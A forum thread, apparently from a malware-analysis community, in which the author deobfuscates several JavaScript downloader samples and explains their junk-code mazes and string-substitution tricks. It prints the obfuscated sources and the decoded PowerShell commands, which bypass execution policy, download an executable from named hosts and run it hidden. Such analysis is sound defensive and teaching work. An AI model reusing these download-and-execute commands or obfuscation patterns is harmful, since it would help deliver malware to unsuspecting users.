Malware Analysis Script-based samples that run Powershell - From Nov,19 2016 to March,06 2017

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
update :

Added one new sample:

From https://malwaretips.com/threads/28-11-2016-20.65943/
thanks to @Der.Reisende

7.js

1) Main difference :

SEE THE FIRST POST FOR EXPLANATIONS

Obfuscated Command Line String :

In function olymip()

var uwnizjiq = "uznehu,uk,uja,ynuja,ebz,uja,rydwo,tj,yuja,ox,Xyuja,ox,fuja,ydwo,ne,uja,fyuja,ox,liuja,v,uznehu,uk,fuja,ydwo,ne,POhalx,uznehu,yuja,ox,halx,rhalx,boqyuja,ox,,halx,coxj,halx,yuja,ox,halx,LLuja,rydwo,tj,yuja,ox,halx,xhalx,yuja,ox,fuja,ydwo,ne,fuja,ydwo,ne,fuja,ydwo,ne,fuja,ydwo,ne,halx,piqyuja,ox,ynuja,ebz,z,yuja,ox,xyuja,ox,uznehu,uk,Usfis,ihalx,oNPhalx,Ohalx,lIuznehu,uk,yfuja,ydwo,ne,halx,bhalx,Yhalx,Phalx,ydwo,halx,boqyuja,ox,,boqyuja,ox,,fuja,ydwo,ne,fuja,ydwo,ne,fuja,ydwo,ne,fuja,ydwo,ne,fuja,ydwo,ne,piqyuja,ox,ynuja,ebz,z,halx,nhalx,ohalx,phalx,ROFhalx,ilyuja,ox,halx,fuja,ydwo,ne,fuja,ydwo,ne,fuja,ydwo,ne,fuja,ydwo,ne,piqyuja,ox,ynuja,ebz,z,halx,uznehu,halx,Inhalx,ynuja,ebz,Ouznehu,boqyuja,ox,,sfis,halx,yhalx,Lyuja,ox,fuja,ydwo,ne,halx,coxj,ihalx,ynuja,ebz,halx,ynuja,ebz,halx,yuja,ox,nfuja,ydwo,ne,vovtu,Nyuja,ox,uznehu,halx,piqyuja,ox,ynuja,ebz,z,halx,Obhalx,Jyuja,ox,uznehu,uk,sfis,fuja,ydwo,ne,fuja,ydwo,ne,halx,boqyuja,ox,,yboqyuja,ox,,sfis,yuja,ox,halx,uja,uja,rydwo,tj,nhalx,yuja,ox,sfis,halx,uja,rydwo,tj,halx,uznehu,yuja,ox,halx,bhalx,uznehu,uk,halx,lhalx,ihalx,yuja,ox,nsfis,usikm,uja,rydwo,tj,halx,ynuja,ebz,Ouznehu,nhalx,loydwo,ynuja,ebz,halx,Fihalx,Lyuja,ox,vovtu,yvybk,coxj,sfis,sfis,pibydwo,gkyuja,ox,,uja,fyuja,ox,liuja,v,uja,fyuja,ox,liuja,v,uznehu,uznehu,uznehu,uja,rydwo,tj,ydwo,lyuja,ox,qopyuja,ox,nydwo,uja,rydwo,tj,sfis,opuja,fyuja,ox,liuja,v,uboqyuja,ox,,yuja,ox,ruja,rydwo,tj,pcoxj,p?f=1uja,rydwo,tj,ynuja,ebz,ydwo,sfis,yvybk,,yvybk,etal,ydwo,ppynuja,ebz,ydwo,sfis,ydwo,etal,uja,rydwo,tj,yuja,ox,xyuja,ox,yvybk,usikm,ufjovuznehu,u,boqyuja,ox,,sfis,ydwo,Rhalx,sfis,piqyuja,ox,ynuja,ebz,z,pROhalx,uznehu,uk,yuja,ox,boqyuja,ox,,boqyuja,ox,,fuja,ydwo,ne,halx,etal,ydwo,pPynuja,ebz,ydwo,sfis,ydwo,etal,uja,rydwo,tj,yuja,ox,xyuja,ox,"​

Array of string with patterns that will be replaced by chars on the obfuscated Command Line String
var urcugeq = ['halx,', 'usikm,', "etal,", "uja,", 'ydwo,', "uznehu,", "coxj,", 'fmane,', 'ynmebz,', "mratj,", "wuk,", 'ymox,', 'ezmehc,', 'vovtu,', 'sfis,', "mfelimv,", "yvybk,", "boqe,", "ibagke,", 'piqedz,', 'ufjovwu,'];

Array of char that will replace the patterns from izyme on the obfuscated Command Line String
var regli = [
["ostirc", "guga", "^"][2],
["aqpidzafw", "teclu", ")"][2],
["oqobq", "fqiwy", '%'][2],
["elesqy", "fjemcatfo", "m"][2],
["qsajcih", "inaxz", 'a'][2],
["tliqywpo", "ulpiqim", "w"][2],
["huhmudf", "pbupmenu", 'h'][2],
["ysyvuc", "jjyve", " "][2],
["umzalo", "arwovz", "d"][2],
["onep", "ehesys", '.'][2],
["vocfe", "dwaczo", "c"][2],
["ovrym", "ksidijt", 'e'][2],
["jvagla", "olugir", "\,"][2],
["edwedsy", "ktopelxu", "("][2],
["orwynixz", "wbati", "t"][2],
["fqome", "wcypub", '/'][2],
["wipuc", "ixij", "'"][2],
["klytdy", "agmosfaxj", "s"][2],
["yxvokkuqs", "ykonipv", ':'][2],
["yxhuz", "esixdarj", "-"][2],
["nuxbu", "ufsyjpi", ';'][2]
];​

here are the main change from previous sample :

=> each char are on the index 2 !

var regli= ["^", ")" ,"%" , "m" , "a" , "w" , "h" ," " , "d", ".", "c" , "e" , "," , "(" , "t" ,"/" ,"'" ,"s" , ":" ,"-" , ";"]​
The script make the same operations to get the deobfuscated command line :

We get :

"cmd.eXe /c PO^we^r^s^h^e^LL.e^x^e ^-execUti^oNP^O^lIcy ^b^Y^P^a^ss -^n^o^p^ROF^ile^ -^w^In^dOwst^y^Le ^hi^d^d^en (New^-^Ob^Ject ^syste^m.n^et^.^we^b^c^l^i^ent).^dOwn^load^Fi^Le('http ://www .aleqopena.top/user.php?f=1.dat','%appdata%\exe');staR^t-pRO^cess ^%apPdata%\exe"
That means :

"cmd.exe /c powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://www.aleqopena.top/user.php?f=1.dat','%appdata%\eXe');start-process %appdata%\eXe"​

To find the run part : still the same method

- The command line deofuscation is made by the function olymip()

=> a search with notepad gives :​

var ohduxa = olymip();

=> a search on ohduxa gives :​

case 66:
oxoqmekq["ru" + "n"](ohduxa, elykfej);
break;
=> oxoqmekq["r" + "un"](ohduxa, elykfej);
var elykfej = 0;
ohduxa :
commande line
=> oxoqmekq["run"](comnandLine, 0)
=> shell.run(comnandLine, 0)

"cmd.exe /c powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http ://www .aleqopena.top/user.php?f=1.dat','%appdata%\eXe');start-process %appdata%\eXe"

runs powershell.exe :

-execuyionpolivy bypass

=> allows to bypass the execution policy
-noprofile
=> to launch the script with in an untouched environment (it ddoesn't load the Windows Powershell profile)
-windowstyle hidden

=> hide the powershell window
(new-object system.net.webclient).downloadfile('http ://www .brownalet.top/id.php?f=1.dat' ,'%appdata%\eXe');

=> creates an .NET object and use its downloadfile method to downlad the payload and save it on HD

=> %appdata%\eXe

=> Example : C:\Users\DardiM\AppData\Roaming\eXe
start-process %appdata%\eXe"
=> run the payload​

Payload:

C:\Users\DardiM\AppData\Roaming\eXe​

URL :

http ://www .aleqopena.top/user.php?f=1.dat
 
Last edited:

Svoll

Level 13
Verified
Top Poster
Well-known
Nov 17, 2016
627
What don't you understand ?
- A big array of chars
- 2 small arrays with the same number of element, each char from one array is changed by the char in another array for same position, and this new char replace all the occurrence of old string on the big array of string... At the end we obtain the famous command lines 'with cmd /c powershell etc .... url.....payload...

My Dearest Professor,

I love and admire how diligently and affectionately you wish to make everyone understand your analysis. I like @tim one explanation "Natural condition, the difficulty is inherent in the context"

The coding you are explaining is complex and very technical and you have taken that and done an awesome job of breaking it down as best as you can. Respect!
 

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
What don't you understand ?
- A big array of chars
- 2 small arrays with the same number of element, each char from one array is changed by the char in another array for same position, and this new char replace all the occurrence of old string on the big array of string... At the end we obtain the famous command lines 'with cmd /c powershell etc .... url.....payload...

My Dearest Professor,

I love and admire how diligently and affectionately you wish to make everyone understand your analysis. I like @tim one explanation "Natural condition, the difficulty is inherent in the context"

The coding you are explaining is complex and very technical and you have taken that and done an awesome job of breaking it down as best as you can. Respect!
Thanks.
Hard to think what part have to be more explain than other parts.
That is why I am preparing a special Tuto, with some important parts often used in script-base malware to request the payload, record the data, save the data in a chosen path and name (after deobfuscation or not of the payload) and to run it.
This way, I will more be able to focus on the code (explaining more certain functions, obfuscation, tricks in details, trying to teach each time something new, that after will be also added to the Tuto.
 

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
From https://malwaretips.com/threads/12-1-2017-7.67475/
Thanks to @silversurfer

https://www.reverse.it/sample/7c454...60220b83ee70f557d6d3babd561?environmentId=100

info.js

Why this sample ?
Because an important (or not) modification has be made.


A big part of the code is to make like a labyrinth :

- a lot of switch / case
- if
- functions
- var declarations
- useless data​

Look one time at the whole code :
Code:
var kahvizp = 0;
var ejorb = 12.2;
var ozebcysx = "ublejboprytn";
var elmabo = 234.4;

function jnujdily() {
    var yhywzysy = undefined;
    return yhywzysy;
}
var qsofyzkiha = typeof window == "undefined";

function zixceko() {
    var ygeh = 0;
    return ygeh;
}
var lorjyswepi = "run";
var aganh = 0;

function igyfsyvhonk() {
    return "71409";
}
function elowe() {
    var ovfiryqpe = undefined;
    return ovfiryqpe;
}
demjitevo = "81395";

function yscisgyppe() {
    var mwaka = null;
    return mwaka;
}
jsupniko = 'wobbacxazw';
akarnycanx = "682";

function ibvafopf() {
    return null;
}
var sxyxwawtape = 'peqecxe';
var ijralamixc = false;

function yderedhu() {
    return 5;
}
var acyrcy = "ezobu";

function sarep() {
    var tkyqolmidi = true;
    return tkyqolmidi;
}
function hlazugm() {
    return 29.2125;
}
var wvuqtel = '75145';
var yhuceslu = undefined;
var dzuwtevsidb = "idkorijdan";

function gilur() {
    return 4;
}
var amravcif = WScript;
var ihwyduq = null;

function oprid() {
    return null;
}
function tupy() {
    return null;
}
function owyqxyxer() {
    return 'orozysp';
}
function xenis() {
    var hedeq = undefined;
    return hedeq;
}
function wnexce() {
    return null;
}
function hpucicyfe() {
    return 19.24;
}
var dapim = 24.08;
switch (ihwyduq) {
case 15.337:
    var cohamp = 1;
    if (cohamp == true) {
        var ohzigva = 5;
    }
    if (yhuceslu === undefined) {
        var rkaphekp = 43;
        if (rkaphekp < 72) {
            var raradh = false;
            var vaqnos = 18;
            var fxepoqr = "26405";
            var zlazipuve = 96;
            var hwobmebyqo = zlazipuve + fxepoqr;
            hwobmebyqo = 23.5 + hwobmebyqo;
            var owuxtuj = 1;
        }
    }
    if (hlazugm() == 30.2125) {
        var himopw = undefined;
        if (himopw === 1) {
            var ktyhkezko = "36091";
            isommywbi = 132;
            var itenhoqvifx = ktyhkezko + isommywbi;
            itenhoqvifx = 4 + itenhoqvifx;
            var owfuvyd = null;
            var ypjebhipvo = null;
            var ysfyljefv = null;
            var rmidqibu = undefined;
            var ynelsol = 7.61;
        }
    }
    break;
case 385:
    var cohamp = 1;
    if (cohamp == true) {
        var ohzigva = 5;
    }
    if (yhuceslu === undefined) {
        var rkaphekp = 43;
        if (rkaphekp < 72) {
            var raradh = false;
            var vaqnos = 18;
            var fxepoqr = "26405";
            var zlazipuve = 96;
            var hwobmebyqo = zlazipuve + fxepoqr;
            hwobmebyqo = 23.5 + hwobmebyqo;
            var owuxtuj = 1;
        }
    }
    if (hlazugm() == 30.2125) {
        var himopw = undefined;
        if (himopw === 1) {
            var ktyhkezko = "36091";
            isommywbi = 132;
            var itenhoqvifx = ktyhkezko + isommywbi;
            itenhoqvifx = 4 + itenhoqvifx;
            var owfuvyd = null;
            var ypjebhipvo = null;
            var ysfyljefv = null;
            var rmidqibu = undefined;
            var ynelsol = 7.61;
        }
    }
    break;
case undefined:
    var cohamp = 1;
    if (cohamp == true) {
        var ohzigva = 5;
    }
    if (yhuceslu === undefined) {
        var rkaphekp = 43;
        if (rkaphekp < 72) {
            var raradh = false;
            var vaqnos = 18;
            var fxepoqr = "26405";
            var zlazipuve = 96;
            var hwobmebyqo = zlazipuve + fxepoqr;
            hwobmebyqo = 23.5 + hwobmebyqo;
            var owuxtuj = 1;
        }
    }
    if (hlazugm() == 30.2125) {
        var himopw = undefined;
        if (himopw === 1) {
            var ktyhkezko = "36091";
            isommywbi = 132;
            var itenhoqvifx = ktyhkezko + isommywbi;
            itenhoqvifx = 4 + itenhoqvifx;
            var owfuvyd = null;
            var ypjebhipvo = null;
            var ysfyljefv = null;
            var rmidqibu = undefined;
            var ynelsol = 7.61;
        }
    }
    break;
case null:
    switch (dapim) {
    case undefined:
        var fovpicbiku = undefined;
        if (fovpicbiku === undefined) {
            var pxafeh = null;
            var zatoxxa = undefined;
            var nnylnymdofle = '4470';
            var ukimbimqusc = "54752";
        }
        break;
    case null:
        var fovpicbiku = undefined;
        if (fovpicbiku === undefined) {
            var pxafeh = null;
            var zatoxxa = undefined;
            var nnylnymdofle = '4470';
            var ukimbimqusc = "54752";
        }
        break;
    case 24.08:
        if (wnexce() === 'yhandirbu') {
            var egoj = null;
            if (egoj == 1) {
                var zfitiwyk = false;
                if (zfitiwyk == false) {
                    var kijhepwura = 90;
                }
            }
        } else {
            var bredapzite = amravcif.CreateObject('WScript.Shell');
            if (oprid() == 542) {
                if (elmabo == 231.4) {
                    var ekilova = 273.773;
                    var xsetekcufy = undefined;
                    var ygtoqipcyvf = 1;
                    var aqelofo = "icyr";
                    esifxugi = 11.17;
                    var uzikobumk = aqelofo + esifxugi;
                    uzikobumk = uzikobumk + 23.695;
                }
            } else {
                switch (tupy()) {
                case 1:
                    if (typeof ibvafopf() == 'object') {
                        var zvadrivw = null;
                        var uqipjivd = "bolvulu";
                        var utnesotyk = 1;
                        ahjurdaja = demjitevo + utnesotyk;
                        ahjurdaja = 623 + ahjurdaja;
                        var icbymesab = undefined;
                        var syvzuzxenw = "pnezabab";
                        lylamo = 75;
                        var asroni = lylamo + syvzuzxenw;
                        asroni = 40.5 + asroni;
                    }
                    if (elowe() == undefined) {
                        var obmeszoso = "uhsapwaxtagl";
                        ocmozyvpas = 24.23;
                        var girololh = ocmozyvpas + obmeszoso;
                        girololh = girololh + 33;
                        var qzyjjuh = "ejynkivucj";
                    }
                    break;
                case null:
                    if (owyqxyxer() === "orozysp") {
                        var svuklov = "609";
                        svuklov = 566.03;
                        switch (xenis()) {
                        case "93731":
                            if (ijralamixc == false) {
                                var unyvpu = 'ofzerwyfez';
                                tcowfevpe = "visjeqpy";
                                var culcurok = 441;
                                kaffobsanqy = culcurok + tcowfevpe;
                                kaffobsanqy = "bokr" + kaffobsanqy;
                            }
                            if (jnujdily() == 1) {
                                var bolodbingy = "hqinpi";
                                var usahsemwywn = 670;
                                giwmuf = bolodbingy + usahsemwywn;
                                giwmuf = 72 + giwmuf;
                                var oteznyp = "8970";
                                var arhukmah = undefined;
                                var omejxir = null;
                                var tamjomhub = 10.352;
                                tamjomhub = 87 + tamjomhub;
                            }
                            var qkegopna = null;
                            if (qkegopna == 1) {
                                var idbuxjyd = 263;
                                var onvepe = true;
                                lcembufysu = "18368";
                                terovrys = 53;
                                var ipolbucy = lcembufysu + terovrys;
                                var orfiqiv = "33938";
                                var yvwovedq = 87.783;
                                var dpesylavr = yvwovedq + orfiqiv;
                                dpesylavr = dpesylavr + "ova";
                            }
                            if (kahvizp === false) {
                                var rsewuvav = "82747";
                                var ivzeqir = true;
                            }
                            break;
                        case true:
                            if (ijralamixc == false) {
                                var unyvpu = 'ofzerwyfez';
                                tcowfevpe = "visjeqpy";
                                var culcurok = 441;
                                kaffobsanqy = culcurok + tcowfevpe;
                                kaffobsanqy = "bokr" + kaffobsanqy;
                            }
                            if (jnujdily() == 1) {
                                var bolodbingy = "hqinpi";
                                var usahsemwywn = 670;
                                giwmuf = bolodbingy + usahsemwywn;
                                giwmuf = 72 + giwmuf;
                                var oteznyp = "8970";
                                var arhukmah = undefined;
                                var omejxir = null;
                                var tamjomhub = 10.352;
                                tamjomhub = 87 + tamjomhub;
                            }
                            var qkegopna = null;
                            if (qkegopna == 1) {
                                var idbuxjyd = 263;
                                var onvepe = true;
                                lcembufysu = "18368";
                                terovrys = 53;
                                var ipolbucy = lcembufysu + terovrys;
                                var orfiqiv = "33938";
                                var yvwovedq = 87.783;
                                var dpesylavr = yvwovedq + orfiqiv;
                                dpesylavr = dpesylavr + "ova";
                            }
                            if (kahvizp === false) {
                                var rsewuvav = "82747";
                                var ivzeqir = true;
                            }
                            break;
                        case '13676':
                            if (ijralamixc == false) {
                                var unyvpu = 'ofzerwyfez';
                                tcowfevpe = "visjeqpy";
                                var culcurok = 441;
                                kaffobsanqy = culcurok + tcowfevpe;
                                kaffobsanqy = "bokr" + kaffobsanqy;
                            }
                            if (jnujdily() == 1) {
                                var bolodbingy = "hqinpi";
                                var usahsemwywn = 670;
                                giwmuf = bolodbingy + usahsemwywn;
                                giwmuf = 72 + giwmuf;
                                var oteznyp = "8970";
                                var arhukmah = undefined;
                                var omejxir = null;
                                var tamjomhub = 10.352;
                                tamjomhub = 87 + tamjomhub;
                            }
                            var qkegopna = null;
                            if (qkegopna == 1) {
                                var idbuxjyd = 263;
                                var onvepe = true;
                                lcembufysu = "18368";
                                terovrys = 53;
                                var ipolbucy = lcembufysu + terovrys;
                                var orfiqiv = "33938";
                                var yvwovedq = 87.783;
                                var dpesylavr = yvwovedq + orfiqiv;
                                dpesylavr = dpesylavr + "ova";
                            }
                            if (kahvizp === false) {
                                var rsewuvav = "82747";
                                var ivzeqir = true;
                            }
                            break;
                        case undefined:
                            var takhovnyd = undefined;
                            if (typeof takhovnyd == 'undefined') {
                                if (qsofyzkiha) {
                                    var ovsut = "cmd.exe /c \"po" + "we" + "rs" + "he" + "ll  $eposj='^le(''ht';$qekos='^ope   Pr';$bzeda='^qfy.ex';$iwjumv='^ss    -Sc';$akisi='^ackand';$cedwaq='^.233.2';$iwadxa='^Set-Ex';$ketumq='^=($env';$casew='^ew-Obj';$bilat='^ocess;';$bpoqoj='^et.Web';$nadug='^e'');(N';$lmyde='^ss $pa';$awdipki='^th';$jysec='^client';$ohmywy='^02.181';$elopmy='^trace.';$sova='^path);';$yhap='^ect Sy';$tcapwi='^:temp+';$okxuwl='^42/.tr';$eraqy='^exe'',$';$opugy='^).Down';$dsawip='^    Start';$rulih='^nPolic';$ihcavo='^ecutio';$bikzo='^tp://2';$famyxs='^ $path';$odad='^''\afwa';$uloju='^y     Bypa';$ofafj='^stem.N';$tovju='^-Proce';$ycigbi='^loadFi'; Invoke-Expression ($iwadxa+$ihcavo+$rulih+$uloju+$iwjumv+$qekos+$bilat+$famyxs+$ketumq+$tcapwi+$odad+$bzeda+$nadug+$casew+$yhap+$ofafj+$bpoqoj+$jysec+$opugy+$ycigbi+$eposj+$bikzo+$ohmywy+$cedwaq+$okxuwl+$akisi+$elopmy+$eraqy+$sova+$dsawip+$tovju+$lmyde+$awdipki);\"";
                                  //  bredapzite[lorjyswepi](ovsut, aganh);
                                    var mfeccyxh = 25;
                                } else {
                                    var ybsyg = undefined;
                                    if (ybsyg == undefined) {
                                        var ocybutir = 'xbavuzguf';
                                        var acujin = 1.525;
                                        var itnufu = ocybutir + acujin;
                                        itnufu = 748.7836 + itnufu;
                                        var nvafanasgo = 'ubli';
                                        nvafanasgo = '23967';
                                    }
                                }
                                var ilucqi = "2053";
                                rnuflicock = 3.5;
                                fpuzzamcervi = ilucqi + rnuflicock;
                                fpuzzamcervi = fpuzzamcervi + 15.31;
                                var uzsozcovbek = 12.065;
                                uzsozcovbek = 107;
                            }
                            break;
                        case false:
                            if (ijralamixc == false) {
                                var unyvpu = 'ofzerwyfez';
                                tcowfevpe = "visjeqpy";
                                var culcurok = 441;
                                kaffobsanqy = culcurok + tcowfevpe;
                                kaffobsanqy = "bokr" + kaffobsanqy;
                            }
                            if (jnujdily() == 1) {
                                var bolodbingy = "hqinpi";
                                var usahsemwywn = 670;
                                giwmuf = bolodbingy + usahsemwywn;
                                giwmuf = 72 + giwmuf;
                                var oteznyp = "8970";
                                var arhukmah = undefined;
                                var omejxir = null;
                                var tamjomhub = 10.352;
                                tamjomhub = 87 + tamjomhub;
                            }
                            var qkegopna = null;
                            if (qkegopna == 1) {
                                var idbuxjyd = 263;
                                var onvepe = true;
                                lcembufysu = "18368";
                                terovrys = 53;
                                var ipolbucy = lcembufysu + terovrys;
                                var orfiqiv = "33938";
                                var yvwovedq = 87.783;
                                var dpesylavr = yvwovedq + orfiqiv;
                                dpesylavr = dpesylavr + "ova";
                            }
                            if (kahvizp === false) {
                                var rsewuvav = "82747";
                                var ivzeqir = true;
                            }
                            break;
                        }
                    }
                    break;
                }
                mzipafx = 28;
                var ewcaqavu = ozebcysx + mzipafx;
                ewcaqavu = ewcaqavu + 'cozagwoxu';
                var osornugu = 'rjyvyglob';
                var mkoqatb = 6.3168;
                var mdipahoz = osornugu + mkoqatb;
                var ovojte = undefined;
                var wikil = '61904';
                var osxivi = '11371';
                var wekivwahqu = 95;
                urxiqab = osxivi + wekivwahqu;
                urxiqab = "icovxywrib" + urxiqab;
                var owohuxk = "75098";
            }
            fywab = 467;
            var yxepquzi = fywab + jsupniko;
            yxepquzi = yxepquzi + '61461';
            var rasmann = 5;
            var suropeka = dzuwtevsidb + rasmann;
            suropeka = 633 + suropeka;
            var erovrixda = "4037";
        }
        break;
    }
    break;
}

I can tell you that only few parts are really important.

The only aim of lot of parts in this sample : to make a path to where the command line is run.
There are some tests , operations, function calls, etc, but all results make that the path to be followed is always the same.
And lot of parts are really useless.

We can easily find the only important part:

Looking for the word run

=> lorjyswepi = "run";
=> aganh = 0;​

we can find where these vars are used (a Find on notepad++) :​

(1) var ovsut =
"cmd.exe /c \"po" + "we" + "rs" + "he" + "ll $eposj='^le(''ht';$qekos='^ope Pr';$bzeda='^qfy.ex';$iwjumv='^ss -Sc';$akisi='^ackand';$cedwaq='^.233.2';$iwadxa='^Set-Ex';$ketumq='^=($env';$casew='^ew-Obj';$bilat='^ocess;';$bpoqoj='^et.Web';$nadug='^e'');(N';$lmyde='^ss $pa';$awdipki='^th';$jysec='^client';$ohmywy='^02.181';$elopmy='^trace.';$sova='^path);';$yhap='^ect Sy';$tcapwi='^:temp+';$okxuwl='^42/.tr';$eraqy='^exe'',$';$opugy='^).Down';$dsawip='^ Start';$rulih='^nPolic';$ihcavo='^ecutio';$bikzo='^tp://2';$famyxs='^ $path';$odad='^''\afwa';$uloju='^y Bypa';$ofafj='^stem.N';$tovju='^-Proce';$ycigbi='^loadFi'; Invoke-Expression ($iwadxa+$ihcavo+$rulih+$uloju+$iwjumv+$qekos+$bilat+$famyxs+$ketumq+$tcapwi+$odad+$bzeda+$nadug+$casew+$yhap+$ofafj+$bpoqoj+$jysec+$opugy+$ycigbi+$eposj+$bikzo+$ohmywy+$cedwaq+$okxuwl+$akisi+$elopmy+$eraqy+$sova+$dsawip+$tovju+$lmyde+$awdipki);\"";
(2) bredapzite[lorjyswepi](ovsut, aganh);

=> shellobject["run"](cmd_line , 0);

var ovsut : obfuscated command line for the run function

=> The deobfuscation is no more made in the js file itself, but once run by cmd.exe :

All the lines are equivalent to :

var lorjyswepi = "run";
var aganh = 0;
var amravcif = WScript;
var bredapzite = amravcif.CreateObject('WScript.Shell');
var ovsut = obfuscated_command_line
bredapzite[lorjyswepi](ovsut, aganh);​

Then equivalent to :​

( WScript.CreateObject('WScript.Shell'))["run"](obfuscated_command_line, 0)

447 lines to 1 line ...

Let deobfuscate the string :

- Use powershell.exe

it's a creation of var with parts, and a the end, a puzzle put in the right order :
$NAME => parts of the puzzle

"cmd.exe /c \"powershell
$eposj='^le(''ht';
$qekos='^ope Pr';
$bzeda='^qfy.ex';
$iwjumv='^ss -Sc';
$akisi='^ackand';
$cedwaq='^.233.2';
$iwadxa='^Set-Ex';
$ketumq='^=($env';
$casew='^ew-Obj';
$bilat='^ocess;';
$bpoqoj='^et.Web';
$nadug='^e'');(N';
$lmyde='^ss $pa';
$awdipki='^th';
$jysec='^client';
$ohmywy='^02.181';
$elopmy='^trace.';
$sova='^path);';
$yhap='^ect Sy';
$tcapwi='^:temp+';
$okxuwl='^42/.tr';
$eraqy='^exe'',$';
$opugy='^).Down';
$dsawip='^ Start';
$rulih='^nPolic';
$ihcavo='^ecutio';
$bikzo='^tp://2';
$famyxs='^ $path';
$odad='^''afwa';
$uloju='^y Bypa';
$ofafj='^stem.N';
$tovju='^-Proce';
$ycigbi='^loadFi';
Invoke-Expression ($iwadxa+$ihcavo+$rulih+$uloju+$iwjumv+$qekos+$bilat+$famyxs+$ketumq+$tcapwi+$odad+$bzeda+$nadug+$casew+$yhap+$ofafj+$bpoqoj+$jysec+$opugy+$ycigbi+$eposj+$bikzo+$ohmywy+$cedwaq+$okxuwl+$akisi+$elopmy+$eraqy+$sova+$dsawip+$tovju+$lmyde+$awdipki);\""​

=> Invoke-Expression(" ...CONTENT.... "); => evaluate the string​

Replacing the parts :

'^Set-Ex^ecutio^nPolic^y Bypa'^ss -Sc^ope Pr^ocess;^ $path''^=($env^:temp+^"afwa^qfy.ex'^e");(N^ew-Obj^ect Sy^stem.N^et.Web^client^).Down^loadFi^le("ht^tp://2^02.181^.233.2^42/.tr^ackand^trace.^exe",$^path);^ Start^-Proce^ss $pa^th'

We can remove the ^ char

Powershell.exe
'Set-ExecutionPolicy Bypass -Scope Process;
$path''=($env:temp+"afwaqfy.exe");
(New-Object System.Net.Webclient).DownloadFile(
"http ://202.181.233.242/.trackandtrace.exe",
$path);
Start-Process $path'​

-execuyionpolivy bypass
=> allows to bypass the execution policy
-noprofile

=> to launch the script with in an untouched environment (it ddoesn't load the Windows Powershell profile)
-windowstyle hidden
=> hide the powershell window
(new-object system.net.webclient).downloadfile(URL ,PATH );
=> creates an .NET object and use its downloadfile method to download the payload and save it on HD
start-process PATH
=> runs the payload on the PATH​

Here :

=> downloads from URL to %TEMP%/afwaqfy.exe
=> runs the payload
(you can see on my previous post, in the same page, all parts used by Powershell.exe in details)​

 
Last edited:

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
From https://malwaretips.com/threads/6-3-2017-20.69284/
Thanks to silversurfer

https://www.reverse.it/sample/614f1...559ca1216f6dd45ad9af4fd2bc7?environmentId=100

Difference from precedent samples :

It is very easy to find where the important part is :
=> a lot of code in these "case"
=> "run"

case undefined:
munmizfaf[[Number(-43.2386), "run", Number(-46.2881), Number(-48.4848), Number(-39.1672), Number(-49.3387)][1]]]
(
[Number(-49.3070), Number(-37.1203), Number(-50.2351), Number(-43.2775), Number(-48.1748), Number(-50.1811), Number(-40.1221), ekvikja(1, [Number(-48.1759), "cmd.exe", Number(-50.3582), Number(-36.4063), Number(-
...
...
...
Number(-35.3626), Number(-44.3878)][7]
, owwyger
);


munmizfaf :

=> var munmizfaf = new ActiveXObject(biswoki);

=> biswoki :

var biswoki = 'WScript.Sh' + 'ell';

=> biswoki = "WScript.Shell"

=> var munmizfaf = new ActiveXObject("WScript.Shell");

Not to difficult to understand :

old version of the command_line :
Code:
var ovsut = "cmd.exe /c \"po" + "we" + "rs" + "he" + "ll  $eposj='^le(''ht';$qekos='^ope   Pr';$bzeda='^qfy.ex';$iwjumv='^ss    -Sc';$akisi='^ackand';$cedwaq='^.233.2';$iwadxa='^Set-Ex';$ketumq='^=($env';$casew='^ew-Obj';$bilat='^ocess;';$bpoqoj='^et.Web';$nadug='^e'');(N';$lmyde='^ss $pa';$awdipki='^th';$jysec='^client';$ohmywy='^02.181';$elopmy='^trace.';$sova='^path);';$yhap='^ect Sy';$tcapwi='^:temp+';$okxuwl='^42/.tr';$eraqy='^exe'',$';$opugy='^).Down';$dsawip='^    Start';$rulih='^nPolic';$ihcavo='^ecutio';$bikzo='^tp://2';$famyxs='^ $path';$odad='^''\afwa';$uloju='^y     Bypa';$ofafj='^stem.N';$tovju='^-Proce';$ycigbi='^loadFi'; Invoke-Expression ($iwadxa+$ihcavo+$rulih+$uloju+$iwjumv+$qekos+$bilat+$famyxs+$ketumq+$tcapwi+$odad+$bzeda+$nadug+$casew+$yhap+$ofafj+$bpoqoj+$jysec+$opugy+$ycigbi+$eposj+$bikzo+$ohmywy+$cedwaq+$okxuwl+$akisi+$elopmy+$eraqy+$sova+$dsawip+$tovju+$lmyde+$awdipki);\"";

Now : they tried to obfuscate a bit more :
=> Arrays of useless and useful parts

Example :

[Number(-43.2386), "run", Number(-46.2881), Number(-48.4848), Number(-39.1672), Number(-49.3387)][1]

=> "run"
shell.run( command_line , 0);
An easy method to get the real parts inside

=> just keep the strings :D

You will obtain the below code : temp vars are created with parts, and at the end, all parts are put in the right order and rhe final string is run by Invoke-Expression

"cmd.exe /c \"powershell $nubli='^/point.';

$bopy='^($env:t';
$awomhe='^gkp'',$p';
$ycahga='^wnloadF';
$ibtizw='^.Webcli';
$oman='^ile(''ht';
$yhajdo='^path';
$lahy='^ent).Do';
$dusi='^ $path=';
$hnezzi='^olicy B';
$bzofhe='^cutionP';
$nuwes='^tart-Pr';
$ofyhq='^emp+''\\n';
$apot='^lpin.no';
$bada='^ath); S';
$zobpisq='^Scope P';
$kewwu='^ect Sys';
$inquzy='^appinm.';
$epem='^ocess $';
$ovivxe='^exe'');(';
$whedoxn='^tem.Net';
$vxylxi='^Set-Exe';
$itnuvy='^udail-a';
$ebep='^ypass -';
$virpyrg='^tp://sa';
$qaxxuhg='^rocess;';
$siwgi='^New-Obj';
Invoke-Expression ($vxylxi+$bzofhe+$hnezzi+$ebep+$zobpisq+$qaxxuhg+$dusi+$bopy+$ofyhq+$inquzy+$ovivxe+$siwgi+$kewwu+$whedoxn+$ibtizw+$lahy+$ycahga+$oman+$virpyrg+$itnuvy+$apot+$nubli+$awomhe+$bada+$nuwes+$epem+$yhajdo);\\\""

In the right order :

Set-ExecutionPolicy Bypass -Scope Process;
$path=($env:temp+''\\nappinm.exe'');
